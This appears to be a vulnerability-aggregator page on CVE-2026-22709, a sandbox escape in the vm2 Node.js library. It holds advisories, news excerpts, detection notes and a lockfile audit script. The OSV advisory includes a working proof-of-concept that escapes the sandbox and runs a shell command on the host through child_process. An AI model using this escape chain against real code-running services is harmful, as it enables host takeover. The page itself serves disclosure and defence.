CVE-2026-22709
Published 2026-01-26
Priority: P2 (65) · Severity: critical · CVSS 3.1 base score 10
Vector: AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
EPSS: 1.22% (64.9th percentile)
vm2 is an open source vm/sandbox for Node.js. In vm2 prior to version 3.10.2, `Promise.prototype.then` `Promise.prototype.catch` callback sanitization can be bypassed. This allows attackers to escape the sandbox and run arbitrary code. In lib/setup-sandbox.js, the callback function of `localPromise.prototype.then` is sanitized, but `globalPromise.prototype.then` is not sanitized. The return value of async functions is `globalPromise` object. Version 3.10.2 fixes the issue.
Affected
7 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| ansible-automation-platform | automation-portal | — | — |
| patriksimek | vm2 | < 3.11.0 | 3.11.0 |
| rhdh | rhdh-hub-rhel9 | — | — |
| vm2_project | vm2 | < 3.11.0 | 3.11.0 |
| vm2_project | vm2 | < 3.10.2 | 3.10.2 |
| vm2_project | vm2 | >= 0 < 3.10.2 | 3.10.2 |
| vm2_project | vm2 | >= 0 < 3.11.0 | 3.11.0 |
Detection & IOCs (extracted from sources)
- The exploit path involves a Promise constructor triggering an unhandled rejection that propagates to the host process; monitor for unhandled rejection events originating from vm2 sandbox contexts.
- The executor-to-unhandledRejection path was NOT patched in v3.10.2; only .then()/.catch() onRejected callbacks were sanitized, so detection logic should cover the Promise executor path as well.
- Vulnerable vm2 versions are 3.10.0 through 3.10.5 (prior to 3.11.0); flag use of these specific npm package versions in software inventories and CI/CD pipelines.
- CVE-2026-22709 is described as trivial to exploit; prioritize detection of vm2 sandbox usage in internet-facing SaaS platforms, online code runners, and chatbots where untrusted code execution is permitted.
- The partial fix in vm2 v3.10.1 and the tightened fix in v3.10.2 only addressed .then()/.catch() callback sanitization; the executor-to-unhandledRejection path remained unpatched until v3.11.0, so detection rules targeting only .then()/.catch() bypass patterns will miss this vector.
- Red Hat packages rhdh/rhdh-hub-rhel9 (Red Hat Developer Hub) and ansible-automation-platform/automation-portal (Self-service automation portal 2) were listed as under investigation for this CVE at time of publication.
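The inventory check suggested in the detection notes above, as an added example that is not part of this page or the vm2 project: it walks a package-lock.json and maps every vm2 copy to the fix versions this page lists (3.10.2 for CVE-2026-22709, 3.11.0 for the follow-up CVE-2026-44001). The lockfile contents and package names below are constructed sample data.

```javascript
// Added example (not from the page or the vm2 project): flag vm2 copies in an
// npm lockfile that fall below the fix versions listed on this page.
// CVE-2026-22709 is fixed in 3.10.2; the follow-up CVE-2026-44001 in 3.11.0.
const VM2_FIXES = [
  { cve: "CVE-2026-22709", fixed: "3.10.2" }, // then/catch callback sanitization bypass
  { cve: "CVE-2026-44001", fixed: "3.11.0" }, // Promise executor unhandled-rejection path
];

// Parses "MAJOR.MINOR.PATCH" (optional leading "v"); pre-release tags are ignored.
function parseSemver(version) {
  const m = /^v?(\d+)\.(\d+)\.(\d+)/.exec(version);
  if (!m) throw new Error(`not a semver version: ${version}`);
  return m.slice(1, 4).map(Number);
}

// Comparator returning -1, 0 or 1, comparing component by component.
function compareSemver(a, b) {
  const [x, y] = [parseSemver(a), parseSemver(b)];
  for (let i = 0; i < 3; i++) if (x[i] !== y[i]) return x[i] < y[i] ? -1 : 1;
  return 0;
}

// CVE ids whose fix version is later than the installed vm2 version.
function vm2Findings(version) {
  return VM2_FIXES.filter((f) => compareSemver(version, f.fixed) < 0).map((f) => f.cve);
}

// Walks the "packages" map of a lockfileVersion 2/3 package-lock.json and reports
// every vm2 copy, including nested ones, that is below a fix version.
function auditLockfile(lock) {
  const findings = [];
  for (const [path, meta] of Object.entries(lock.packages || {})) {
    if (!path.endsWith("node_modules/vm2") || !meta.version) continue;
    const cves = vm2Findings(meta.version);
    if (cves.length > 0) findings.push({ path, version: meta.version, cves });
  }
  return findings;
}

// Constructed sample lockfile: a direct vm2 at 3.10.4 (past the 22709 fix but
// still exposed to 44001) and a nested copy already on 3.11.0.
const SAMPLE_LOCK = {
  lockfileVersion: 3,
  packages: {
    "": { name: "sample-app", version: "1.0.0" },
    "node_modules/vm2": { version: "3.10.4" },
    "node_modules/code-runner/node_modules/vm2": { version: "3.11.0" },
  },
};

console.log(JSON.stringify(auditLockfile(SAMPLE_LOCK), null, 2));
```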
CVSS provenance
| Source | Version | Score | Severity | Vector |
|---|---|---|---|---|
| nvd | 3.1 | 10.0 | CRITICAL | CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H |
| ghsa | — | 10.0 | CRITICAL | — |
| vendor_redhat | — | 10.0 | CRITICAL | — |
Red Hat
vm2: vm2: Sandbox escape leads to Denial of Service
vendor_redhat·2026-05-13·CVSS 10.0
CVE-2026-44001 [CRITICAL] CWE-248
vm2 is an open source vm/sandbox for Node.js. Prior to 3.11.0, a sandbox escape vulnerability in vm2 v3.10.5 allows any sandboxed code to crash the host Node.js process via a single Promise constructor that triggers an unhandled rejection propagating to the host. The fix for CVE-2026-22709 (v3.10.2) only sanitized the onRejected callback in .then() and .catch() overrides and did not address the executor-to-unhandledRejection path. This vulnerability is fixed in 3.11.0.
A flaw was found in vm2 (before 3.11.0). Sandboxed code can crash the host Node.js process via a Promise constructor that triggers an unhandled rejection propagating to the host; the CVE-2026-22709 fix only sanitized .then()/.catch() callbacks, not the executor path. Fixe
GHSA
vm2 has a Sandbox Escape via Promise Constructor Unhandled Rejection (Process Crash DoS)
ghsa·2026-05-07·CVSS 10.0
CVE-2026-44001 [CRITICAL] CWE-248
### Summary
A sandbox escape vulnerability in vm2 v3.10.5 allows any sandboxed code to crash the host Node.js process via a single Promise constructor that triggers an unhandled rejection propagating to the host. The fix for CVE-2026-22709 (v3.10.2) only sanitized the `onRejected` callback in `.then()` and `.catch()` overrides and did not address the executor-to-unhandledRejection path.
### Details
When sandboxed code creates a `Promise` whose executor sets `Error.name` to a `Symbol()` and then accesses `.stack`, V8's internal `FormatStackTrace` (C++) attempts `Symbol.toString()`, which throws a **host-realm TypeError**. Because this error originates inside the Promise executor and no `.catch()` hand
OSV
vm2 has a Sandbox Escape
osv·2026-01-26
CVE-2026-22709 [CRITICAL]
In vm2 for version 3.10.0, `Promise.prototype.then` `Promise.prototype.catch` callback sanitization can be bypassed. This allows attackers to escape the sandbox and run arbitrary code.
```js
const { VM } = require("vm2");
const code = `
const error = new Error();
error.name = Symbol();
const f = async () => error.stack;
const promise = f();
promise.catch(e => {
const Error = e.constructor;
const Function = Error.constructor;
const f = new Function(
"process.mainModule.require('child_process').execSync('echo HELLO WORLD!', { stdio: 'inherit' })"
);
f();
});
`;
new VM().run(code);
```
In lib/setup-sandbox.js, the callback function of `localPromise.prototype.then` is sanitized, but `globalPromise.prototype.then` is not sanitized. The return value of async functio
GHSA
vm2 has a Sandbox Escape
ghsa·2026-01-26
CVE-2026-22709 [CRITICAL] CWE-693
Advisory text and proof-of-concept are identical to the OSV entry above.
No detection rules found.
No public exploits indexed.
Hackernews
vm2 Node.js Library Vulnerabilities Enable Sandbox Escape and Arbitrary Code Execution
blogs_hackernews·2026-05-07·CVSS 10.0
CVE-2026-24118 [CRITICAL]
A dozen critical security vulnerabilities have been disclosed in the vm2 Node.js library that could be exploited by bad actors to break out of the sandbox and execute arbitrary code on susceptible systems.
vm2 is an open-source library used to run untrusted JavaScript code inside a secure sandbox by intercepting and proxying JavaScript objects to prevent sandboxed code from accessing the host environment.
The security flaws are listed below -
CVE-2026-24118 (CVSS score: 9.8) - A vulnerability that allows sandbox escape via "__lookupGette
Bleepingcomputer
Critical vm2 sandbox bug lets attackers execute code on hosts
blogs_bleepingcomputer·2026-05-06·CVSS 9.8
CVE-2026-26956 [CRITICAL]
By Bill Toulas
A critical vulnerability in the popular Node.js sandboxing library vm2 allows escaping the sandbox and executing arbitrary code on the host system.
The security issue is tracked as CVE-2026-26956 and has been confirmed to impact vm2 version 3.10.4, although earlier releases may also be vulnerable. Proof-of-concept (PoC) exploit code has been published.
In the security advisory, the maintainer says that the issue only impacts environments with Node.js 25 (confirmed on Node.js 25.6.1) that have enabled WebAssembly exception handling and JSTag support.
vm2 is an open-source Node.js library used to run untrusted JavaScript code inside a restricted sandbox environment. It is commonly employed by online coding p
Bleepingcomputer
Critical sandbox escape flaw found in popular vm2 NodeJS library
blogs_bleepingcomputer·2026-01-27·CVSS 9.8
CVE-2026-22709 [CRITICAL]
By Bill Toulas
A critical-severity vulnerability in the vm2 Node.js sandbox library, tracked as CVE-2026-22709, allows escaping the sandbox and executing arbitrary code on the underlying host system.
The open-source vm2 library creates a secure context to allow users to execute untrusted JavaScript code that does not have access to the filesystem.
vm2 has historically been seen in SaaS platforms that support user script execution, online code runners, chatbots, and open-source projects, being used in more than 200,000 projects on GitHub. The project was discontinued in 2023, though, due to repeated sandbox-escape vulnerabilities, and considered unsafe for running untrusted code.
Last October, maintainer Patrik Šimek d
Wiz
CVE-2026-22709 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 9.8
CVE-2026-22709 [CRITICAL]
## CVE-2026-22709: JavaScript vulnerability analysis and mitigation
Source: NVD
- Score: 10
- Published: January 26, 2026
- Severity: CRITICAL
- CNA Score: 9.8
- High-profile Vulnerability: Yes
- Affected Technologies: JavaScript
- Has Public Exploit: Yes
- Has CISA KEV Exploit: No
- CISA KEV Release Date: N/A
- CISA KEV Due Date: N/A
- Exploitation Probability Percentile (EPSS): 14.2
- Exploitation Probability (EPSS): N/A
- Affected packages and libraries: vm2
- Sources: NVD
- npm: Severity CRITICAL, Has Fix, Added at Jan 27, 2026
Bugzilla
CVE-2026-44001 vm2: vm2: Sandbox escape leads to Denial of Service
bugzilla·2026-05-13·CVSS 10.0
CVE-2026-44001 [CRITICAL]
Description identical to the Red Hat advisory text above.